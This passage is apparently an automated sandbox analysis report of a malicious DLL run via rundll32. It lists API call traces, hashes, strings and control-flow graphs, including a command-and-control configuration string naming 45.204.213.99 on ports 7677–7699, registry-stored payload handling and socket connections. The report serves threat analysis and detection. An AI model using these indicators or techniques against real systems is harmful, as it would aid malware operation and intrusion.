                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: .$L$Pending error polled more than once$cookie2too many redirectsassertion failed: slot.is_none()D:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\oneshot.rs
                              • API String ID: 2162964266-3828590624
                              • Opcode ID: baf883ee94bd6e327904e48ebc54efe2c15739c0ea5f370a4da1912d954afdae
                              • Instruction ID: 345d8401b4f7ac9c7ad0658fd75a40a7efd286afbb972d24557aa2f13f67f16b
                              • Opcode Fuzzy Hash: baf883ee94bd6e327904e48ebc54efe2c15739c0ea5f370a4da1912d954afdae
                              • Instruction Fuzzy Hash: 09B28F716087408BD725CF24C490BEEB7E1BFC5318F14892DE8999BB81EB75A849CB52
                              APIs
                              • NtCreateFile.NTDLL ref: 6CBF4879
                              • RtlNtStatusToDosError.NTDLL ref: 6CBF4884
                              • CreateIoCompletionPort.KERNEL32(?,?,00000000,00000000), ref: 6CBF48FB
                              • SetFileCompletionNotificationModes.KERNEL32(?,00000002), ref: 6CBF490B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: CompletionCreateFile$ErrorModesNotificationPortStatus
                              • String ID:
                              • API String ID: 986160054-0
                              • Opcode ID: 8a17320c4addc1d2d740beca9f018256152d159cc1402b8a30e41b57f84e6260
                              • Instruction ID: 6d67ef3a4b6fce4d57cf8d1aeb910dc0d82fc81ee6cef3bfe16352e869e807b2
                              • Opcode Fuzzy Hash: 8a17320c4addc1d2d740beca9f018256152d159cc1402b8a30e41b57f84e6260
                              • Instruction Fuzzy Hash: 0341B8B1244345AFE7008F2ACA41B6ABBF0FB05715F14892DE1A9CB782D774E846CB51
                              APIs
                              • _memset.LIBCMT ref: 04DB600C
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04DB6018
                              • Process32FirstW.KERNEL32(00000000,00000000), ref: 04DB6049
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 04DB609F
                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 04DB60A6
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                              • String ID:
                              • API String ID: 2526126748-0
                              • Opcode ID: 30e0322e740bf335009a78b6f0f1a31cc7ce83626368a11fc52ad79c7b7723d0
                              • Instruction ID: bca6d9cddc8e9780134d1e58274b6ecbdba415a320c85018617c1e7cf02383cc
                              • Opcode Fuzzy Hash: 30e0322e740bf335009a78b6f0f1a31cc7ce83626368a11fc52ad79c7b7723d0
                              • Instruction Fuzzy Hash: F021A631B11514DBDB20EF649C55BEE73A5FF18714F004699E94697280EB35EA04C6A2
                              APIs
                              • CoInitialize.OLE32(00000000), ref: 04DB662B
                              • CoCreateInstance.OLE32(04DD470C,00000000,00000001,04DD46FC,?,?,?,?,?,?,?,?,?,?,04DB5816), ref: 04DB6642
                              • SysFreeString.OLEAUT32(?), ref: 04DB66DC
                              • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,04DB5816), ref: 04DB670D
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateFreeInitializeInstanceStringUninitialize
                              • String ID: FriendlyName
                              • API String ID: 841178590-3623505368
                              • Opcode ID: b829822b1e02ac2cf5c0dfd2ac49abb546f7a0a05a4b8ef4144ab20f8f5733fb
                              • Instruction ID: 3ab925a7d31fa84788e628c5060a170eb8173d2ea6a9ed8ef208b1a6bc083715
                              • Opcode Fuzzy Hash: b829822b1e02ac2cf5c0dfd2ac49abb546f7a0a05a4b8ef4144ab20f8f5733fb
                              • Instruction Fuzzy Hash: 0E314A7574020AAFDB00DB99DC81EAEB7B9EF88704F148198F905EB250DA71ED05CBA1
                              APIs
                              • NtDeviceIoControlFile.NTDLL ref: 6CBF43F2
                              • RtlNtStatusToDosError.NTDLL ref: 6CBF4404
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ControlDeviceErrorFileStatus
                              • String ID: called `Result::unwrap()` on an `Err` value
                              • API String ID: 2674770877-2333694755
                              • Opcode ID: d4c7ac25d392baac3031df868a607ea835608c5ad889ad60d54d81613dd58956
                              • Instruction ID: 49cd28f624f271906e48315525f6831e316df338ceae9fbd0d2b8ec9519d8460
                              • Opcode Fuzzy Hash: d4c7ac25d392baac3031df868a607ea835608c5ad889ad60d54d81613dd58956
                              • Instruction Fuzzy Hash: FAD1A0706083818FDB04CF18C59065EB7E1EF89314F14896DE8E99BB55DB30E94ACF92
                              APIs
                              • RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,?), ref: 6CC11CD5
                                • Part of subcall function 6CC0C93D: RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00000000,?,?,6CC11D27,6CCB58B1), ref: 6CC0C99B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: OpenQueryValue
                              • String ID:
                              • API String ID: 4153817207-0
                              • Opcode ID: 43029e02a3c72852b0c8edd61182e289017f547c3976e4a9865af6d2c83ed0e2
                              • Instruction ID: 8a24623766656e913170fb597ddb7d014c4c8185dd307044a5033dc90822fd4c
                              • Opcode Fuzzy Hash: 43029e02a3c72852b0c8edd61182e289017f547c3976e4a9865af6d2c83ed0e2
                              • Instruction Fuzzy Hash: BC52BF7560C3819FD324CF16C49179BB7E1AFCA354F148A2DE4899BB80EB70D949DB82
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Time_memmovetime
                              • String ID:
                              • API String ID: 1463837790-0
                              • Opcode ID: a33751873963d48464177ddebefe0ce4e98efc1813e4d62cf5909671d04c76e6
                              • Instruction ID: 2cf828d07125d010131c8f2b652e9308d6a7352324a1970b4f216174dfb8da0f
                              • Opcode Fuzzy Hash: a33751873963d48464177ddebefe0ce4e98efc1813e4d62cf5909671d04c76e6
                              • Instruction Fuzzy Hash: 13518D72720202AFD715DFA9C8C0A6AB7E5BF48314714C668ED198B782DB31F855CBD0
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastbind
                              • String ID:
                              • API String ID: 2328862993-0
                              • Opcode ID: 03b138a667a7cff859c47e3b18d36dae558f3a8157213bed39ccdf1449c72c03
                              • Instruction ID: 158949f83903053d330d73e62ebc5d5bb3d36b4a61a13d07356134408c5fd339
                              • Opcode Fuzzy Hash: 03b138a667a7cff859c47e3b18d36dae558f3a8157213bed39ccdf1449c72c03
                              • Instruction Fuzzy Hash: 01D05E71204221AFE7205F29D604BBA7EEDAF06214F14C8ADE4C4D6641EB74C884DB70

                              Control-flow Graph

                              APIs
                              • _memset.LIBCMT ref: 04205E71
                                • Part of subcall function 04205D70: lstrlenW.KERNEL32(?), ref: 04205D88
                                • Part of subcall function 04205D70: _memset.LIBCMT ref: 04205D92
                                • Part of subcall function 04205D70: lstrlenW.KERNEL32(|p1:45.204.213.99|o1:7677|t1:1|p2:45.204.213.99|o2:7688|t2:1|p3:45.204.213.99|o3:7699|t3:1|dd:1|cl:1|fz:), ref: 04205D9F
                                • Part of subcall function 04205D70: lstrlenW.KERNEL32(?), ref: 04205DA7
                              • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0420601B
                              • RegQueryValueExW.KERNEL32(?,IpDate,00000000,00000003,00000000,00000000), ref: 04206040
                              • _memset.LIBCMT ref: 04206058
                              • RegQueryValueExW.ADVAPI32(?,IpDate,00000000,00000003,|p1:45.204.213.99|o1:7677|t1:1|p2:45.204.213.99|o2:7688|t2:1|p3:45.204.213.99|o3:7699|t3:1|dd:1|cl:1|fz:,0000000A), ref: 04206078
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: _memsetlstrlen$QueryValue$Open
                              • String ID: Console$IpDate$bb:$bd:$bh:$bz:$cl:$dd:$dl:$fz:$jp:$kl:$ll:$o1:$o2:$o3:$p1:$p2:$p3:$sh:$sx:$t1:$t2:$t3:$|p1:45.204.213.99|o1:7677|t1:1|p2:45.204.213.99|o2:7688|t2:1|p3:45.204.213.99|o3:7699|t3:1|dd:1|cl:1|fz:
                              • API String ID: 3278200350-1944154923
                              • Opcode ID: c86ae5f4fb450e946f4d7ff774d3d5bad56f2b8e96592f6a770f4ade6df9ce2b
                              • Instruction ID: 2874941c2d4e30d035c51feed4e4c7cb3e8981977ffc944e39a7f7899accf2bb
                              • Opcode Fuzzy Hash: c86ae5f4fb450e946f4d7ff774d3d5bad56f2b8e96592f6a770f4ade6df9ce2b
                              • Instruction Fuzzy Hash: 9551B8B8BF07497BF620B6B55C4FF5D6BD44BF1E48F508052B600B91E6A9E035808DAE

                              Control-flow Graph

                              APIs
                              • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 04205517
                              • RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 0420553E
                              • _memset.LIBCMT ref: 04205558
                              • RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 04205573
                              • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 04205596
                              • RegCloseKey.ADVAPI32(?), ref: 042055C1
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 04205615
                              • _memset.LIBCMT ref: 04205679
                              • _memset.LIBCMT ref: 0420569D
                              • _memset.LIBCMT ref: 042056AF
                              • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 04205736
                              • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 042057A9
                              • RegDeleteValueW.KERNEL32(?,d33f351a4aeea5e608853d1a56661059), ref: 042057BC
                              • RegSetValueExW.KERNEL32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000065), ref: 042057D4
                              • RegCloseKey.KERNEL32(?), ref: 042057DE
                              • Sleep.KERNEL32(00000BB8), ref: 0420580E
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                              • String ID: !jWW$.$Console\0$_$d33f351a4aeea5e608853d1a56661059$e$f43067d8a2da24686468c8b827b2e02f$i$l${vU_
                              • API String ID: 354323817-2578179815
                              • Opcode ID: 791a7e5008f095eec84c5bcc83ba94727e1f443d2e0791da7dabae8651a8f0cc
                              • Instruction ID: 2d3f0125eb451074a2f7dfe9214c67ef709739cf45e54324763e0fe1b85263f3
                              • Opcode Fuzzy Hash: 791a7e5008f095eec84c5bcc83ba94727e1f443d2e0791da7dabae8651a8f0cc
                              • Instruction Fuzzy Hash: FF91B275B50204BBE720DF55DC44FAA7BB9EB99710F008198F9089B291DBB4BE80CF51

                              Control-flow Graph

                              APIs
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A02F
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A06A
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A0C3
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A12D
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A175
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A1B6
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A1C8
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A1F4
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A251
                              Strings
                              • future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs, xrefs: 6CC1A27D, 6CC1A299
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs
                              • API String ID: 2162964266-1242699868
                              • Opcode ID: dec1c8303d4823aa71901df86451f7dc3bcb9432fe60ddd05f78d1ca0162357f
                              • Instruction ID: 18506eeddd6cf1f8bda1c43b3425fe2052d759f362c2e4dc7c9845cbeb5de31c
                              • Opcode Fuzzy Hash: dec1c8303d4823aa71901df86451f7dc3bcb9432fe60ddd05f78d1ca0162357f
                              • Instruction Fuzzy Hash: 61926B759087818FC761CF25C480B9BBBF5BF89310F04896EE88D9B741EB709949DB92

                              Control-flow Graph

                              control_flow_graph 1911 4db9db0-4db9de5 GdipGetImagePixelFormat 1912 4db9dea-4db9e11 1911->1912 1913 4db9de7 1911->1913 1914 4db9e29-4db9e2f 1912->1914 1915 4db9e13-4db9e23 1912->1915 1913->1912 1916 4db9e4b-4db9e64 GdipGetImageHeight 1914->1916 1917 4db9e31-4db9e41 1914->1917 1915->1914 1918 4db9e69-4db9e8c GdipGetImageWidth 1916->1918 1919 4db9e66 1916->1919 1917->1916 1920 4db9e8e 1918->1920 1921 4db9e91-4db9eae call 4db9b90 1918->1921 1919->1918 1920->1921 1924 4db9faf-4db9fb4 1921->1924 1925 4db9eb4-4db9ec8 1921->1925 1926 4dba1ff-4dba215 call 4dbef64 1924->1926 1927 4dba029-4dba031 1925->1927 1928 4db9ece-4db9ee7 GdipGetImagePaletteSize 1925->1928 1932 4dba037-4dba074 GdipBitmapLockBits 1927->1932 1933 4dba165-4dba1d6 GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 1927->1933 1929 4db9ee9 1928->1929 1930 4db9eec-4db9ef8 1928->1930 1929->1930 1934 4db9efa-4db9f05 call 4db95b0 1930->1934 1935 4db9f12-4db9f1a 1930->1935 1936 4dba076-4dba07b 1932->1936 1937 4dba0a5-4dba0d2 1932->1937 1939 4dba1dc-4dba1de 1933->1939 1934->1935 1958 4db9f07-4db9f10 call 4dcc660 1934->1958 1945 4db9f1c-4db9f2a call 4dbf5d3 1935->1945 1946 4db9f30-4db9f35 call 4db1280 1935->1946 1947 4dba09b-4dba0a0 1936->1947 1948 4dba07d 1936->1948 1940 4dba11a-4dba139 GdipBitmapUnlockBits 1937->1940 1941 4dba0d4-4dba0e9 call 4dc0750 1937->1941 1942 4dba1fd 1939->1942 1943 4dba1e0 1939->1943 1940->1939 1952 4dba13f-4dba142 1940->1952 1964 4dba15b-4dba160 call 4db1280 1941->1964 1965 4dba0eb-4dba0f2 1941->1965 1942->1926 1949 4dba1e8-4dba1fb call 4dbf599 1943->1949 1961 4db9f3a-4db9f45 1945->1961 1967 4db9f2c-4db9f2e 1945->1967 1946->1961 1947->1926 1953 4dba086-4dba099 call 4dbf599 1948->1953 1949->1942 1971 4dba1e2 1949->1971 1952->1939 1953->1947 1977 4dba080 1953->1977 1962 4db9f47-4db9f49 1958->1962 1961->1962 1969 4db9f4b-4db9f4d 1962->1969 1970 4db9f76-4db9f90 GdipGetImagePalette 1962->1970 1964->1933 
1965->1964 1972 4dba0f9-4dba118 1965->1972 1973 4dba151-4dba156 call 4db1280 1965->1973 1974 4dba147-4dba14c call 4db1280 1965->1974 1967->1962 1978 4db9f4f 1969->1978 1979 4db9f6c-4db9f71 1969->1979 1980 4db9f92 1970->1980 1981 4db9f95-4db9f9a 1970->1981 1971->1949 1972->1940 1972->1941 1973->1964 1974->1973 1977->1953 1984 4db9f57-4db9f6a call 4dbf599 1978->1984 1979->1926 1980->1981 1985 4db9f9c-4db9fa2 1981->1985 1986 4db9fa4-4db9faa call 4dbcc20 1981->1986 1984->1979 1995 4db9f51 1984->1995 1985->1986 1989 4db9fb9-4db9fbd 1985->1989 1986->1924 1990 4db9fbf 1989->1990 1991 4db9ff4-4dba023 call 4db9ce0 SetDIBColorTable call 4dba280 1989->1991 1993 4db9fc2-4db9ff2 1990->1993 1991->1927 1993->1991 1993->1993 1995->1984
                              APIs
                              • GdipGetImagePixelFormat.GDIPLUS(Function_00009960,?,?,00000000), ref: 04DB9DDB
                              • GdipGetImageHeight.GDIPLUS(Function_00009960,?,?,00000000), ref: 04DB9E5C
                              • GdipGetImageWidth.GDIPLUS(Function_00009960,?,?,00000000), ref: 04DB9E84
                              • GdipGetImagePaletteSize.GDIPLUS(Function_00009960,?,?,00000000), ref: 04DB9EDF
                              • _malloc.LIBCMT ref: 04DB9F20
                                • Part of subcall function 04DBF5D3: __FF_MSGBANNER.LIBCMT ref: 04DBF5EC
                                • Part of subcall function 04DBF5D3: __NMSG_WRITE.LIBCMT ref: 04DBF5F3
                                • Part of subcall function 04DBF5D3: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04DC44E0,00000000,00000001,00000000,?,04DC8DE6,00000018,04DD6448,0000000C,04DC8E76), ref: 04DBF618
                              • _free.LIBCMT ref: 04DB9F60
                              • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 04DB9F88
                              • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 04DBA00C
                              • GdipBitmapLockBits.GDIPLUS(Function_00009960,?,00000001,?,?,?,00000000), ref: 04DBA06C
                              • _free.LIBCMT ref: 04DBA08F
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Gdip$Image$Palette_free$AllocateBitmapBitsColorFormatHeapHeightLockPixelSizeTableWidth_malloc
                              • String ID: &
                              • API String ID: 1451381890-3042966939
                              • Opcode ID: 892e35435105279abc40681b8cca6cb86cae5151de6173415ec4c4b5a9c99191
                              • Instruction ID: 493169b9e0617794fb30324d5f8e82f78efbea171d0a27a771a8df98b2380039
                              • Opcode Fuzzy Hash: 892e35435105279abc40681b8cca6cb86cae5151de6173415ec4c4b5a9c99191
                              • Instruction Fuzzy Hash: 30D12BF1A00219DBDB24CF55CC94BAAB7B4FB48314F0085E9E74A97201D774AE85CFA9

                              Control-flow Graph

                              APIs
                              • ResetEvent.KERNEL32(?), ref: 04DB2DBB
                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04DB2DC7
                              • timeGetTime.WINMM ref: 04DB2DCD
                              • socket.WS2_32(00000002,00000001,00000006), ref: 04DB2DFA
                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 04DB2E26
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04DB2E32
                              • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 04DB2E51
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04DB2E5D
                              • gethostbyname.WS2_32(00000000), ref: 04DB2E6B
                              • htons.WS2_32(?), ref: 04DB2E8D
                              • connect.WS2_32(?,?,00000010), ref: 04DB2EAB
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                              • String ID: 0u
                              • API String ID: 640718063-3203441087
                              • Opcode ID: fee500ae9d0c7d3e93b009b089b98d7e605069cb3e41c92c285e32c34a847ec5
                              • Instruction ID: e34eb855045ab743b3203417f8cea12e6bfed2a82271292e92d76c992df4cd90
                              • Opcode Fuzzy Hash: fee500ae9d0c7d3e93b009b089b98d7e605069cb3e41c92c285e32c34a847ec5
                              • Instruction Fuzzy Hash: D1614F71A40304AFE720DFA5DC45FAAB7B8FF4CB10F10455DF656A7280D7B4A9048BA5

                              Control-flow Graph

                              APIs
                              • ResetEvent.KERNEL32(?), ref: 04202D9B
                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04202DA7
                              • timeGetTime.WINMM ref: 04202DAD
                              • socket.WS2_32(00000002,00000001,00000006), ref: 04202DDA
                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 04202E06
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04202E12
                              • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 04202E31
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04202E3D
                              • gethostbyname.WS2_32(00000000), ref: 04202E4B
                              • htons.WS2_32(?), ref: 04202E6D
                              • connect.WS2_32(?,?,00000010), ref: 04202E8B
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                              • String ID: 0u
                              • API String ID: 640718063-3203441087
                              • Opcode ID: 8abab83ab64dfcf743ee493e72094c5facc81c5990ebb1c7d3766fc8e920363d
                              • Instruction ID: 96622bcc1ea64264dbf44f4524985dc4f31d2f8339a70feefe1a4326984c6ce5
                              • Opcode Fuzzy Hash: 8abab83ab64dfcf743ee493e72094c5facc81c5990ebb1c7d3766fc8e920363d
                              • Instruction Fuzzy Hash: E36191B1A50308BFE720DFA8DC49FAAB7F8FF48710F104519F645A72D0DAB0A9448B64

                              Control-flow Graph

                              control_flow_graph 2780 4dbaca0-4dbacbb 2781 4dbacbd-4dbaceb RegOpenKeyExW 2780->2781 2782 4dbad14-4dbad1f 2780->2782 2783 4dbad09-4dbad0e 2781->2783 2784 4dbaced-4dbad03 RegQueryValueExW 2781->2784 2785 4dbb7c7-4dbb7cd call 4db2c80 2782->2785 2786 4dbad25-4dbad2c 2782->2786 2783->2782 2790 4dbb7d0-4dbb7d6 2783->2790 2784->2783 2785->2790 2787 4dbad7a-4dbad81 2786->2787 2788 4dbaf73-4dbb02b call 4dbf667 call 4dc67e0 call 4dbef4e call 4dc7660 call 4dbf667 call 4dbce90 call 4dbef4e 2786->2788 2787->2790 2791 4dbad87-4dbadb9 call 4dbf667 call 4dc67e0 2787->2791 2838 4dbb0f3-4dbb11a call 4dbf989 CloseHandle 2788->2838 2839 4dbb031-4dbb07e call 4dc7660 RegCreateKeyW 2788->2839 2802 4dbadbb-4dbadcf wsprintfW 2791->2802 2803 4dbadd2-4dbadde 2791->2803 2802->2803 2806 4dbae2a-4dbae81 call 4dbef4e call 4dc7660 call 4db2b90 call 4dbef59 * 2 2803->2806 2807 4dbade0 2803->2807 2810 4dbade4-4dbadef 2807->2810 2813 4dbadf0-4dbadf6 2810->2813 2816 4dbadf8-4dbadfb 2813->2816 2817 4dbae16-4dbae18 2813->2817 2821 4dbadfd-4dbae05 2816->2821 2822 4dbae12-4dbae14 2816->2822 2818 4dbae1b-4dbae1d 2817->2818 2823 4dbae1f-4dbae28 2818->2823 2824 4dbae84-4dbae99 2818->2824 2821->2817 2827 4dbae07-4dbae10 2821->2827 2822->2818 2823->2806 2823->2810 2830 4dbaea0-4dbaea6 2824->2830 2827->2813 2827->2822 2833 4dbaea8-4dbaeab 2830->2833 2834 4dbaec6-4dbaec8 2830->2834 2835 4dbaead-4dbaeb5 2833->2835 2836 4dbaec2-4dbaec4 2833->2836 2837 4dbaecb-4dbaecd 2834->2837 2835->2834 2841 4dbaeb7-4dbaec0 2835->2841 2836->2837 2842 4dbaecf-4dbaed1 2837->2842 2843 4dbaf3e-4dbaf70 call 4dbf989 CloseHandle call 4dbef59 2837->2843 2857 4dbb0db-4dbb0f0 RegCloseKey call 4dbfa29 2839->2857 2858 4dbb080-4dbb0d0 call 4dbef4e call 4db59c0 RegDeleteValueW RegSetValueExW 2839->2858 2841->2830 2841->2836 2848 4dbaed3-4dbaede call 4dbef59 2842->2848 2849 4dbaee5-4dbaeec 2842->2849 2848->2849 2855 4dbaeee-4dbaef9 call 4dbfa29 2849->2855 2856 4dbaf00-4dbaf04 2849->2856 2855->2856 2864 
